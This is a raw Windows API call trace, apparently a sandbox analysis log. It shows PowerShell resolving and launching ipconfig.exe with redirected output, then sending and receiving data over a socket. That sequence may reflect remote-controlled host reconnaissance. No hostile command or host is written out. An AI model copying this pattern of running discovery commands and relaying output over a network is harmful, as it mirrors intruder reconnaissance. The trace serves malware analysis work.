	[0212.677] SetErrorMode (uMode=0x1) returned 0x1
	[0212.679] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.679] SetErrorMode (uMode=0x1) returned 0x1
	[0212.679] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.BAT", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0212.685] SetErrorMode (uMode=0x1) returned 0x1
	[0212.685] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.686] SetErrorMode (uMode=0x1) returned 0x1
	[0212.686] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.CMD", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0212.692] SetErrorMode (uMode=0x1) returned 0x1
	[0212.693] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.694] SetErrorMode (uMode=0x1) returned 0x1
	[0212.694] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.VBS", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0212.705] SetErrorMode (uMode=0x1) returned 0x1
	[0212.988] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.988] SetErrorMode (uMode=0x1) returned 0x1
	[0212.988] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.VBE", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.005] SetErrorMode (uMode=0x1) returned 0x1
	[0213.009] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0213.009] SetErrorMode (uMode=0x1) returned 0x1
	[0213.010] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.JS", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.026] SetErrorMode (uMode=0x1) returned 0x1
	[0213.028] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0213.028] SetErrorMode (uMode=0x1) returned 0x1
	[0213.029] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.JSE", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.449] SetErrorMode (uMode=0x1) returned 0x1
	[0213.452] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0213.452] SetErrorMode (uMode=0x1) returned 0x1
	[0213.452] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.WSF", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.463] SetErrorMode (uMode=0x1) returned 0x1
	[0213.464] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0213.465] SetErrorMode (uMode=0x1) returned 0x1
	[0213.465] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.WSH", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.478] SetErrorMode (uMode=0x1) returned 0x1
	[0213.480] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0213.480] SetErrorMode (uMode=0x1) returned 0x1
	[0213.480] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.MSC", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.484] SetErrorMode (uMode=0x1) returned 0x1
	[0213.485] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0213.486] SetErrorMode (uMode=0x1) returned 0x1
	[0213.486] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.718] SetErrorMode (uMode=0x1) returned 0x1
	[0213.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0213.722] SetErrorMode (uMode=0x1) returned 0x1
	[0213.723] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\ipconfig.ps1", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.723] SetErrorMode (uMode=0x1) returned 0x1
	[0213.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0213.725] SetErrorMode (uMode=0x1) returned 0x1
	[0213.725] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\ipconfig.psm1", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.725] SetErrorMode (uMode=0x1) returned 0x1
	[0213.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0213.726] SetErrorMode (uMode=0x1) returned 0x1
	[0213.727] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\ipconfig.psd1", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.727] SetErrorMode (uMode=0x1) returned 0x1
	[0213.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0213.728] SetErrorMode (uMode=0x1) returned 0x1
	[0213.728] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\ipconfig.COM", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.729] SetErrorMode (uMode=0x1) returned 0x1
	[0213.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0213.730] SetErrorMode (uMode=0x1) returned 0x1
	[0213.730] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\ipconfig.EXE", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89a21ae5, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x89a21ae5, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xe460dc40, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xe400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipconfig.exe", cAlternateFileName="")) returned 0x1b829520
	[0213.733] FindNextFileW (in: hFindFile=0x1b829520, lpFindFileData=0x1c6ec7b0 | out: lpFindFileData=0x1c6ec7b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89a21ae5, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x89a21ae5, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xe460dc40, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xe400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipconfig.exe", cAlternateFileName="")) returned 0
	[0213.733] FindClose (in: hFindFile=0x1b829520 | out: hFindFile=0x1b829520) returned 1
	[0213.733] SetErrorMode (uMode=0x1) returned 0x1
	[0213.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\ipconfig.exe", nBufferLength=0x105, lpBuffer=0x1c6ec8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\ipconfig.exe", lpFilePart=0x0) returned 0x20
	[0213.735] SetErrorMode (uMode=0x1) returned 0x1
	[0213.735] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\ipconfig.exe" (normalized: "c:\\windows\\system32\\ipconfig.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c6ecad0 | out: lpFileInformation=0x1c6ecad0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89a21ae5, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x89a21ae5, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xe460dc40, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xe400)) returned 1
	[0213.736] SetErrorMode (uMode=0x1) returned 0x1
	[0213.738] CoTaskMemAlloc (cb=0x104) returned 0x1b84b990
	[0213.738] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b84b990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.738] CoTaskMemFree (pv=0x1b84b990) 
	[0213.741] CoTaskMemAlloc (cb=0x104) returned 0x1b84b990
	[0213.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b84b990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.741] CoTaskMemFree (pv=0x1b84b990) 
	[0214.041] CoTaskMemAlloc (cb=0x104) returned 0x1b84b990
	[0214.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b84b990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0214.041] CoTaskMemFree (pv=0x1b84b990) 
	[0214.966] CoTaskMemAlloc (cb=0x22) returned 0x1b839ce0
	[0214.966] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\ipconfig.exe", dwFileAttributes=0x0, psfi=0x1c6eccb8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c6eccb8) returned 0x4550
	[0215.781] CoTaskMemFree (pv=0x1b839ce0) 
	[0215.785] GetConsoleWindow () returned 0x14017c
	[0215.795] CoTaskMemAlloc (cb=0x104) returned 0x1b7dbf00
	[0215.795] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dbf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0215.795] CoTaskMemFree (pv=0x1b7dbf00) 
	[0215.796] CoTaskMemAlloc (cb=0x104) returned 0x1b7dbf00
	[0215.796] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b7dbf00, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0215.796] CoTaskMemFree (pv=0x1b7dbf00) 
	[0215.803] CoTaskMemAlloc (cb=0x104) returned 0x1b7dbf00
	[0215.804] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b7dbf00, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0215.804] CoTaskMemFree (pv=0x1b7dbf00) 
	[0215.806] CommandLineToArgvW (in: lpCmdLine="", pNumArgs=0x1c6ecd00 | out: pNumArgs=0x1c6ecd00) returned 0x1b7e2780*="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
	[0215.808] LocalFree (hMem=0x1b7e2780) returned 0x0
	[0215.818] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0215.820] CreatePipe (in: hReadPipe=0x1c6ecc80, hWritePipe=0x1c6ecc78, lpPipeAttributes=0x1c6ecc50, nSize=0x0 | out: hReadPipe=0x1c6ecc80*=0x4ac, hWritePipe=0x1c6ecc78*=0x4e8) returned 1
	[0215.820] GetCurrentProcess () returned 0xffffffffffffffff
	[0215.820] GetCurrentProcess () returned 0xffffffffffffffff
	[0215.821] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x4ac, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c6eccf8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c6eccf8*=0x4ec) returned 1
	[0215.821] CloseHandle (hObject=0x4ac) returned 1
	[0215.821] CreatePipe (in: hReadPipe=0x1c6ecc80, hWritePipe=0x1c6ecc78, lpPipeAttributes=0x1c6ecc50, nSize=0x0 | out: hReadPipe=0x1c6ecc80*=0x4ac, hWritePipe=0x1c6ecc78*=0x4f4) returned 1
	[0215.821] GetCurrentProcess () returned 0xffffffffffffffff
	[0215.822] GetCurrentProcess () returned 0xffffffffffffffff
	[0215.822] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x4ac, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c6eccf8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c6eccf8*=0x4f8) returned 1
	[0215.822] CloseHandle (hObject=0x4ac) returned 1
	[0215.823] CoTaskMemAlloc (cb=0x88) returned 0x1b7e2780
	[0215.823] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\ipconfig.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c6ecc60*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x4e8, hStdError=0x4f4), lpProcessInformation=0x30d1900 | out: lpCommandLine="\"C:\\Windows\\system32\\ipconfig.exe\"", lpProcessInformation=0x30d1900*(hProcess=0x4fc, hThread=0x4ac, dwProcessId=0xc78, dwThreadId=0xc7c)) returned 1
	[0216.491] CoTaskMemFree (pv=0x1b7e2780) 
	[0216.491] CloseHandle (hObject=0x4e8) returned 1
	[0216.491] CloseHandle (hObject=0x4f4) returned 1
	[0216.492] GetConsoleOutputCP () returned 0x1b5
	[0216.495] GetFileType (hFile=0x4ec) returned 0x3
	[0216.495] GetConsoleOutputCP () returned 0x1b5
	[0216.495] GetFileType (hFile=0x4f8) returned 0x3
	[0216.497] CloseHandle (hObject=0x4ac) returned 1
	[0216.498] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4ac
	[0216.498] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x4e8
	[0216.499] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x504
	[0216.499] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x500
	[0217.210] SetEvent (hEvent=0x4ac) returned 1
	[0217.210] SetEvent (hEvent=0x4e8) returned 1
	[0217.233] SetEvent (hEvent=0x4ac) returned 1
	[0217.233] SetEvent (hEvent=0x4e8) returned 1
	[0217.236] SetEvent (hEvent=0x4e8) returned 1
	[0217.980] SetEvent (hEvent=0x4ac) returned 1
	[0217.980] SetEvent (hEvent=0x4e8) returned 1
	[0217.981] SetEvent (hEvent=0x4ac) returned 1
	[0217.981] SetEvent (hEvent=0x4e8) returned 1
	[0217.981] SetEvent (hEvent=0x4ac) returned 1
	[0217.982] SetEvent (hEvent=0x4e8) returned 1
	[0217.982] SetEvent (hEvent=0x4ac) returned 1
	[0217.982] SetEvent (hEvent=0x4e8) returned 1
	[0217.982] SetEvent (hEvent=0x4ac) returned 1
	[0217.982] SetEvent (hEvent=0x4e8) returned 1
	[0217.983] SetEvent (hEvent=0x4e8) returned 1
	[0218.511] SetEvent (hEvent=0x4e8) returned 1
	[0218.516] SetEvent (hEvent=0x4e8) returned 1
	[0218.521] SetEvent (hEvent=0x4ac) returned 1
	[0218.521] SetEvent (hEvent=0x4e8) returned 1
	[0218.524] SetEvent (hEvent=0x4ac) returned 1
	[0218.524] SetEvent (hEvent=0x4e8) returned 1
	[0218.525] SetEvent (hEvent=0x4e8) returned 1
	[0218.527] SetEvent (hEvent=0x4e8) returned 1
	[0218.528] SetEvent (hEvent=0x4e8) returned 1
	[0218.531] SetEvent (hEvent=0x4ac) returned 1
	[0218.531] SetEvent (hEvent=0x4e8) returned 1
	[0218.531] SetEvent (hEvent=0x4ac) returned 1
	[0218.531] SetEvent (hEvent=0x4e8) returned 1
	[0218.532] SetEvent (hEvent=0x4e8) returned 1
	[0218.533] SetEvent (hEvent=0x4e8) returned 1
	[0218.535] SetEvent (hEvent=0x4e8) returned 1
	[0218.549] GetCurrentProcess () returned 0xffffffffffffffff
	[0218.549] GetCurrentProcess () returned 0xffffffffffffffff
	[0218.550] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x4fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c6ecde8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c6ecde8*=0x530) returned 1
	[0218.553] GetExitCodeProcess (in: hProcess=0x4fc, lpExitCode=0x1c6ece58 | out: lpExitCode=0x1c6ece58*=0x0) returned 1
	[0218.561] send (s=0x414, buf=0x313c938*, len=95, flags=0) returned 95
	[0218.562] recv (in: s=0x414, buf=0x303f408, len=502, flags=0 | out: buf=0x303f408*) returned 400
	[0218.569] VirtualQuery (in: lpAddress=0x1c6eca60, lpBuffer=0x1c6ed920, dwLength=0x30 | out: lpBuffer=0x1c6ed920*(BaseAddress=0x1c6ec000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0218.762] CoTaskMemAlloc (cb=0x104) returned 0x1b7dbf00
	[0218.762] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dbf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.762] CoTaskMemFree (pv=0x1b7dbf00) 
	[0218.797] CoTaskMemAlloc (cb=0x104) returned 0x1b7dbf00
	[0218.797] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dbf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.797] CoTaskMemFree (pv=0x1b7dbf00) 
	[0219.659] CoGetObjectContext (in: riid=0x1c6ecd78*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd70 | out: ppv=0x1c6ecd70*=0x321868) returned 0x0
	[0219.659] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd90 | out: pAptType=0x1c6ecd90*=1) returned 0x0
	[0219.659] IUnknown:QueryInterface (in: This=0x321868, riid=0x3005488*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece98 | out: ppvObject=0x1c6ece98*=0x0) returned 0x80004002
	[0219.660] IUnknown:Release (This=0x321868) returned 0x1
	[0219.662] CoGetClassObject (in: rclsid=0x1b82a358*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec400 | out: ppv=0x1c6ec400*=0x1cd11dc0) returned 0x0
